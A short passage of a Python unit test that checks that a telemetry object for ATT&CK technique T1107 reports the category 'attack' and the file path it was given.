assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"
def test_T1107_send__path(spy_send_telemetry):
T1107Telem(STATUS, Path(PATH)).send()
assert json.loads(spy_send_telemetry.data)["path"] == PATH